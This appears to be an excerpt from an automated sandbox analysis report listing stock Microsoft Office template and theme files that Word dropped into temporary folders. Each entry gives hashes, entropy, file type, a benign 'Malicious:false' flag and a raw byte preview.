                                        Category:dropped
                                        Size (bytes):262
                                        Entropy (8bit):3.4901887319218092
                                        Encrypted:false
                                        SSDEEP:6:fxnxUXqhBMl0OoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyiMl0OoGHmD0+dAH/luWvv
                                        MD5:52BD0762F3DC77334807DDFC60D5F304
                                        SHA1:5962DA7C58F742046A116DDDA5DC8EA889C4CB0E
                                        SHA-256:30C20CC835E912A6DD89FD1BF5F7D92B233B2EC24594F1C1FE0CADB03A8C3FAB
                                        SHA-512:FB68B1CF9677A00D5651C51EC604B61DAC2D250D44A71D43CD69F41F16E4F0A7BAA7AD4A6F7BB870429297465A893013BBD7CC77A8F709AD6DB97F5A0927B1DD
                                        Malicious:false
                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .R.a.d.i.a.l.P.i.c.t.u.r.e.L.i.s.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                        C:\Users\user\AppData\Local\Temp\TCD8D17.tmp\RadialPictureList.glox

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):5596
                                        Entropy (8bit):7.875182123405584
                                        Encrypted:false
                                        SSDEEP:96:dGa2unnLYEB2EUAPOak380NQjqbHaPKJebgrEVws8Vw+BMa0EbdLVQaZJgDZh0pJ:UJunLYEB2EUAxk3pIYaScgYwsV4bdS0X
                                        MD5:CDC1493350011DB9892100E94D5592FE
                                        SHA1:684B444ADE2A8DBE760B54C08F2D28F2D71AD0FA
                                        SHA-256:F637A67799B492FEFFB65632FED7815226396B4102A7ED790E0D9BB4936E1548
                                        SHA-512:3699066A4E8A041079F12E88AB2E7F485E968619CB79175267842846A3AD64AA8E7778CBACDF1117854A7FDCFB46C8025A62F147C81074823778C6B4DC930F12
                                        Malicious:false
                                        Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK.........V.<.S.....Y.......diagrams/layout1.xml.\.r.8...U....m.$.."3.....;...../3.XAn..O.?....V.;...")Nr.O.H....O......_..E..S...L7....8H.y<=............~...Ic......v9.X.%.\.^.,?g.v.?%w...f.).9.........Ld;.1..?~.%QQ...h.8;.gy..c4..]..0Ii.K&.[.9.......E4B.a..?e.B..4....E.......Y.?_&!.....i~..{.W..b....L.?..L..@.F....c.H..^..i...(d.......w...9..9,........q..%[..]K}.u.k..V.%.Y.....W.y..;e4[V..u.!T...).%.

                                        C:\Users\user\AppData\Local\Temp\TCD8D18.tmp\Content.inf

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):260
                                        Entropy (8bit):3.494357416502254
                                        Encrypted:false
                                        SSDEEP:6:fxnxUX0XPE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyEXPGHmD0+dAH/luWvv
                                        MD5:6F8FE7B05855C203F6DEC5C31885DD08
                                        SHA1:9CC27D17B654C6205284DECA3278DA0DD0153AFF
                                        SHA-256:B7F58DF058C938CCF39054B31472DC76E18A3764B78B414088A261E440870175
                                        SHA-512:C518A243E51CB4A1E3C227F6A8A8D9532EE111D5A1C86EBBB23BD4328D92CD6A0587DF65B3B40A0BE2576D8755686D2A3A55E10444D5BB09FC4E0194DB70AFE6
                                        Malicious:false
                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.h.e.m.e.P.i.c.t.u.r.e.G.r.i.d...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                        C:\Users\user\AppData\Local\Temp\TCD8D18.tmp\ThemePictureGrid.glox

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                        Category:dropped
                                        Size (bytes):6193
                                        Entropy (8bit):7.855499268199703
                                        Encrypted:false
                                        SSDEEP:192:WavHMKgnU2HUGFhUnkbOKoztj1QfcnLYut3d8:YKeUlGXUnC+HQSMp
                                        MD5:031C246FFE0E2B623BBBD231E414E0D2
                                        SHA1:A57CA6134779D54691A4EFD344BC6948E253E0BA
                                        SHA-256:2D76C8D1D59EDB40D1FBBC6406A06577400582D1659A544269500479B6753CF7
                                        SHA-512:6A784C28E12C3740300883A0E690F560072A3EA8199977CBD7F260A21E8346B82BA8A4F78394D3BB53FA2E98564B764C2D0232C40B25FB6085C36D20D70A39D1
                                        Malicious:false
                                        Preview:PK........X..<..Zn|...........diagrams/layout1.xmlz........]..H.}......M,l#g.j:.G-eu.*S=.$......T_6..I...6...d.NJ....r.p.p.........|.z.K.M..L.T.(........<..ks.......o...t}...P..*.7...`.+.[...H..._..X.u.....N....n....n|..=.....K.:.G7.u....."g.n.h...O.,...c...f.b.P......>[l.....j.*.?..mxk..n..|A...,\o..j..wQ.....lw.~].Lh..{3Y..D..5.Y..n..Mh.r..J....6*.<.kO...Alv.._.qdKQ.5...-FMN......;.~..._..pv..&...%"Nz].n............vM.`..k..a.:.f]...a........y.....g0..`........|V...Yq.....#...8....n..i7w<2Rp...R.@.]..%.b%..~...a..<.j...&....?...Qp..Ow|&4>...d.O.|.|...Fk;t.P[A..i.6K.~...Y.N..9......~<Q..f...i.....6..U...l. ..E..4$Lw..p..Y%NR..;...B|B.U...\e......S...=...B{A.]..*....5Q.....FI..w....q.s{.K....(.]...HJ9........(.....[U|.....d71.Vv.....a.8...L.....k;1%.T.@+..uv.~v.]`.V....Z.....`.M.@..Z|.r........./C..Z.n0.....@.YQ.8..q.h.....c.%...p..<..zl.c..FS.D..fY..z..=O..%L..MU..c.:.~.....F]c......5.=.8.r...0....Y.\o.o....U.~n...`...Wk..2b......I~

                                        C:\Users\user\AppData\Local\Temp\TCD8D4A.tmp\Content.inf

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):290
                                        Entropy (8bit):3.5081874837369886
                                        Encrypted:false
                                        SSDEEP:6:fxnxUXCOzi8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnydONGHmD0wbnKYZAH/lMZqiv
                                        MD5:8D9B02CC69FA40564E6C781A9CC9E626
                                        SHA1:352469A1ABB8DA1DC550D7E27924E552B0D39204
                                        SHA-256:1D4483830710EF4A2CC173C3514A9F4B0ACA6C44DB22729B7BE074D18C625BAE
                                        SHA-512:8B7DB2AB339DD8085104855F847C48970C2DD32ADB0B8EEA134A64C5CC7DE772615F85D057F4357703B65166C8CF0C06F4F6FD3E60FFC80DA3DD34B16D5B1281
                                        Malicious:false
                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .g.o.s.t.n.a.m.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                                        C:\Users\user\AppData\Local\Temp\TCD8D4A.tmp\gostname.xsl

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):255948
                                        Entropy (8bit):5.103631650117028
                                        Encrypted:false
                                        SSDEEP:6144:gwprAm795vtfb8p4bgWPWEtTmtcRCDPThNPFQwB+26RxlsIBkAgRMBHcTCwsHe5a:kW
                                        MD5:9888A214D362470A6189DEFF775BE139
                                        SHA1:32B552EB3C73CD7D0D9D924C96B27A86753E0F97
                                        SHA-256:C64ED5C2A323C00E84272AD3A701CAEBE1DCCEB67231978DE978042F09635FA7
                                        SHA-512:8A75FC2713003FA40B9730D29C786C76A796F30E6ACE12064468DD2BB4BF97EF26AC43FFE1158AB1DB06FF715D2E6CDE8EF3E8B7C49AA1341603CE122F311073
                                        Malicious:false
                                        Preview:<?xml version="1.0" encoding="utf-8"?>............<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select=

                                        C:\Users\user\AppData\Local\Temp\TCD8D4B.tmp\Parallax.thmx

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                        Category:dropped
                                        Size (bytes):924687
                                        Entropy (8bit):7.824849396154325
                                        Encrypted:false
                                        SSDEEP:12288:lsadD3eLxI8XSh4yDwFw8oWR+6dmw2ZpQDKpazILv7Jzny/ApcWqyOpEZULn:qLxI8XSh4yUF/oWR+mLKpYIr7l3ZQ7n
                                        MD5:97EEC245165F2296139EF8D4D43BBB66
                                        SHA1:0D91B68CCB6063EB342CFCED4F21A1CE4115C209
                                        SHA-256:3C5CF7BDB27592791ADF4E7C5A09DDE4658E10ED8F47845064DB1153BE69487C
                                        SHA-512:8594C49CAB6FF8385B1D6E174431DAFB0E947A8D7D3F200E622AE8260C793906E17AA3E6550D4775573858EA1243CCBF7132973CD1CF7A72C3587B9691535FF8
                                        Malicious:false
                                        Preview:PK..........1AS'......ip......[Content_Types].xml..n.@.._......8ie'......}.......(y...H}......3Fi..%2.v?..3..._...d=..E.g.....7.i.-.t5.6......}}.m9r.......m...ML.g.M.eV$.r..*.M..l0...A...M..j;.w={o.f..F....i..v......5..d;..D.ySa...M&..qd*w>.O.{h...|w..5.]..'.CS<.:8C}.g.|E.../..>..].Tnml..I.......r.Gv.E....7.;.E......4/l.....6.K.C?1qz.O.v_..r......\c.c.>..lS........X.N.3N.sN..N.)'.%'..'..N.pL.E...T.!..CR....Ie..k.o..M..w.B.0}..3....v..+....,.q..pz.......v{.;....s3.|..V..ZZ......0.[.....x.....!.!~.8.e..n..&.}p....s.i.. ..[]...q.r....~..+.A\...q............e.-)h9..."Z.>...5-C..`..g.}........r.A.+..\...r.>.... .W.\...re?..%.-/hiA..ZR.r.W.D.\}.EK..kZ.>......5..9.&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^h....L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i..`..G..j..).&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^j..K.L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i.

                                        C:\Users\user\AppData\Local\Temp\TCD8D4B.tmp\content.inf

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):282
                                        Entropy (8bit):3.51145753448333
                                        Encrypted:false
                                        SSDEEP:6:Q+sxnxUXKsWkRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxny6svymD0wbnKNAH/lMz1
                                        MD5:7956D2B60E2A254A07D46BCA07D0EFF0
                                        SHA1:AF1AC8CA6FE2F521B2EE2B7ABAB612956A65B0B5
                                        SHA-256:C92B7FD46B4553FF2A656FF5102616479F3B503341ED7A349ECCA2E12455969E
                                        SHA-512:668F5D0EFA2F5168172E746A6C32820E3758793CFA5DB6791DE39CB706EF7123BE641A8134134E579D3E4C77A95A0F9983F90E44C0A1CF6CDE2C4E4C7AF1ECA0
                                        Malicious:false
                                        Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .P.a.r.a.l.l.a.x...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                        C:\Users\user\AppData\Local\Temp\TCD8D5C.tmp\Wood_Type.thmx

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):1649585
                                        Entropy (8bit):7.875240099125746
                                        Encrypted:false
                                        SSDEEP:24576:L368X6z95zf5BbQ6U79dYy2HiTIxRboyM/LZTl5KnCc:r68kb7UTYxGIxmnp65
                                        MD5:35200E94CEB3BB7A8B34B4E93E039023
                                        SHA1:5BB55EDAA4CDF9D805E36C36FB092E451BDDB74D
                                        SHA-256:6CE04E8827ABAEA9B292048C5F84D824DE3CEFDB493101C2DB207BD4475AF1FD
                                        SHA-512:ED80CEE7C22D10664076BA7558A79485AA39BE80582CEC9A222621764DAE5EFA70F648F8E8C5C83B6FE31C2A9A933C814929782A964A47157505F4AE79A3E2F9
                                        Malicious:false
                                        Preview:PK..........1A..u._....P......[Content_Types].xml..Ms.@.....!...=.7....;a.h.&Y..l..H~..`;...d..g/..e..,M..C...5...#g/."L..;...#. ]..f...w../._.2Y8..X.[..7._.[...K3..#.4......D.]l.?...~.&J&....p..wr-v.r.?...i.d.:o....Z.a|._....|.d...A....A".0.J......nz....#.s.m.......(.]........~..XC..J......+.|...(b}...K!._.D....uN....u..U..b=.^..[...f...f.,...eo..z.8.mz....."..D..SU.}ENp.k.e}.O.N....:^....5.d.9Y.N..5.d.q.^s..}R...._E..D...o..o...o...f.6;s.Z]...Uk6d.j..MW....5[C].f#...l;u.M..Z.../iM|...b...S.....0.zN.... ...>..>..>..>..>..>..>........e...,..7...F(L.....>.ku...i...i...i...i...i...i...i........yi.....G...1.....j...r.Z]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o|^Z....Q}.;.o...9.Z..\.V...............................jZ......k.pT...0.zN.... ...>..>..>..>..>..>..>........e...,..7...f(L.....>.ku...i...i...i...i...i...i...i........yi.......n.....{.._f...0...PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...

                                        C:\Users\user\AppData\Local\Temp\TCD8D5C.tmp\content.inf

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):284
                                        Entropy (8bit):3.5552837910707304
                                        Encrypted:false
                                        SSDEEP:6:Q+sxnxUXtLARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnygymD0wbnKNAH/lMz1
                                        MD5:5728F26DF04D174DE9BDFF51D0668E2A
                                        SHA1:C998DF970655E4AF9C270CC85901A563CFDBCC22
                                        SHA-256:979DAFD61C23C185830AA3D771EDDC897BEE87587251B84F61776E720ACF9840
                                        SHA-512:491B36AC6D4749F7448B9A3A6E6465E8D97FB30F33EF5019AF65660E98F4570711EFF5FC31CBB8414AD9355029610E6F93509BC4B2FB6EA79C7CB09069DE7362
                                        Malicious:false
                                        Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .W.o.o.d._.T.y.p.e...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                        C:\Users\user\AppData\Local\Temp\TCD8D7C.tmp\Parcel.thmx

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):608122
                                        Entropy (8bit):7.729143855239127
                                        Encrypted:false
                                        SSDEEP:6144:Ckl6KRKwg9jf2q/bN69OuGFlC/DUhq68xOcJzGYnTxlLqU8dmTW:8yKwgZ2qY9kA7Uhq68H3ybmq
                                        MD5:8BA551EEC497947FC39D1D48EC868B54
                                        SHA1:02FA15FDAF0D7E2F5D44CAE5FFAE49E8F91328DF
                                        SHA-256:DB2E99B969546E431548EBD58707FC001BBD1A4BDECAD387D194CC9C6D15AC89
                                        SHA-512:CC97F9B2C83FF7CAC32AB9A9D46E0ACDE13EECABECD653C88F74E4FC19806BB9498D2F49C4B5581E58E7B0CB95584787EA455E69D99899381B592BEA177D4D4B
                                        Malicious:false
                                        Preview:PK.........LGE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK.........LG.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....

                                        C:\Users\user\AppData\Local\Temp\TCD8D7C.tmp\content.inf

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):278
                                        Entropy (8bit):3.516359852766808
                                        Encrypted:false
                                        SSDEEP:6:Q+sxnxUXKwRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxny6qymD0wbnKNAH/lMz1
                                        MD5:960E28B1E0AB3522A8A8558C02694ECF
                                        SHA1:8387E9FD5179A8C811CCB5878BAC305E6A166F93
                                        SHA-256:2707FCA8CEC54DF696F19F7BCAD5F0D824A2AC01B73815DE58F3FCF0AAB3F6A0
                                        SHA-512:89EA06BA7D18B0B1EA624BBC052F73366522C231BD3B51745B92CF056B445F9D655F9715CBDCD3B2D02596DB4CD189D91E2FE581F2A2AA2F6D814CD3B004950A
                                        Malicious:false
                                        Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .P.a.r.c.e.l...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                        C:\Users\user\AppData\Local\Temp\TCD8D8F.tmp\View.thmx

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):486596
                                        Entropy (8bit):7.668294441507828
                                        Encrypted:false
                                        SSDEEP:6144:A+JBmUx0Zo24n8z/2NSYFl2qGBuv8p6+LwwYmN59wBttsdJrmXMlP1NwQoGgeL:fNgxz/g5z2BT6+Eu0ntMcczNQG5L
                                        MD5:0E37AECABDB3FDF8AAFEDB9C6D693D2F
                                        SHA1:F29254D2476DF70979F723DE38A4BF41C341AC78
                                        SHA-256:7AC7629142C2508B070F09788217114A70DE14ACDB9EA30CBAB0246F45082349
                                        SHA-512:DE6AFE015C1D41737D50ADD857300996F6E929FED49CB71BC59BB091F9DAB76574C56DEA0488B0869FE61E563B07EBB7330C8745BC1DF6305594AC9BDEA4A6BF
                                        Malicious:false
                                        Preview:PK.........V'BE,.{....#P......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`.../.|u1..Y.....nK.......u=..2.tu~^L.Y5]/...~+.v...o....j.`?.S...../.by.|..>."kZbs....H.9..m.z.]W.V.?~v........;...N.......w....;.z..N.......w.....R.~n..Ofu.-..K.e....{..A.~.8.#D..)o.7..........:2........=......f...u....[..}...u.6b...xz.[...G..|#...$....)J./.......7.............oQ..]^.M........wy}7a.....&l................w.......l._...l..?.A..........r..9.|.8.........{w...........n...]^.M........wy}7a.....&l.................`..z..`.....2.o...wx}.....>..c.M..Arr#.....nD..[.....w......n...]^.M........wy}7a.....&l........w........... ..Fp....w_Q....g..tL.i.?H.o...]^..........n...]^.M........wy}7a.....&l.................`..z..`

                                        C:\Users\user\AppData\Local\Temp\TCD8D8F.tmp\content.inf

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):274
                                        Entropy (8bit):3.535303979138867
                                        Encrypted:false
                                        SSDEEP:6:Q+sxnxUX3IlVARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnynG6ymD0wbnKNAH/lMz1
                                        MD5:35AFE8D8724F3E19EB08274906926A0B
                                        SHA1:435B528AAF746428A01F375226C5A6A04099DF75
                                        SHA-256:97B8B2E246E4DAB15E494D2FB5F8BE3E6361A76C8B406C77902CE4DFF7AC1A35
                                        SHA-512:ACF4F124207974CFC46A6F4EA028A38D11B5AF40E55809E5B0F6F5DABA7F6FC994D286026FAC19A0B4E2311D5E9B16B8154F8566ED786E5EF7CDBA8128FD62AF
                                        Malicious:false
                                        Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .V.i.e.w...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                        C:\Users\user\AppData\Local\Temp\TCD8DEE.tmp\Frame.thmx

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):523048
                                        Entropy (8bit):7.715248170753013
                                        Encrypted:false
                                        SSDEEP:6144:WfmDdN6Zfv8q5rnM6vZ02PtMZRkfW5ipbnMHxVcsOWrCMxy0sD/mcKb4rYEY:xDdQXBrMi2YtggW5ObnMH1brJpUmBU0N
                                        MD5:C276F590BB846309A5E30ADC35C502AD
                                        SHA1:CA6D9D6902475F0BE500B12B7204DD1864E7DD02
                                        SHA-256:782996D93DEBD2AF9B91E7F529767A8CE84ACCC36CD62F24EBB5117228B98F58
                                        SHA-512:B85165C769DFE037502E125A04CFACDA7F7CC36184B8D0A54C1F9773666FFCC43A1B13373093F97B380871571788D532DEEA352E8D418E12FD7AAD6ADB75A150
                                        Malicious:false
                                        Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....

                                        C:\Users\user\AppData\Local\Temp\TCD8DEE.tmp\content.inf

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):276
                                        Entropy (8bit):3.5159096381406645
                                        Encrypted:false
                                        SSDEEP:6:Q+sxnxUXQIa3ARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnygIaqymD0wbnKNAH/lMz1
                                        MD5:71CCB69AF8DD9821F463270FB8CBB285
                                        SHA1:8FED3EB733A74B2A57D72961F0E4CF8BCA42C851
                                        SHA-256:8E63D7ABA97DABF9C20D2FAC6EB1665A5D3FDEAB5FA29E4750566424AE6E40B4
                                        SHA-512:E62FC5BEAEC98C5FDD010FABDAA8D69237D31CA9A1C73F168B1C3ED90B6A9B95E613DEAD50EB8A5B71A7422942F13D6B5A299EB2353542811F2EF9DA7C3A15DC
                                        Malicious:false
                                        Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .F.r.a.m.e...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                        C:\Users\user\AppData\Local\Temp\TCD8E0E.tmp\Dividend.thmx

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):570901
                                        Entropy (8bit):7.674434888248144
                                        Encrypted:false
                                        SSDEEP:6144:D2tTXiO/3GH5SkPQVAqWnGrkFxvay910UUTWZJarUv9TA0g8:kX32H+VWgkFxSgGTmarUv9T
                                        MD5:D676DE8877ACEB43EF0ED570A2B30F0E
                                        SHA1:6C8922697105CEC7894966C9C5553BEB64744717
                                        SHA-256:DF012D101DE808F6CD872DFBB619B16732C23CF4ABC64149B6C3CE49E9EFDA01
                                        SHA-512:F40BADA680EA5CA508947290BA73901D78DE79EAA10D01EAEF975B80612D60E75662BDA542E7F71C2BBA5CA9BA46ECAFE208FD6E40C1F929BB5E407B10E89FBD
                                        Malicious:false
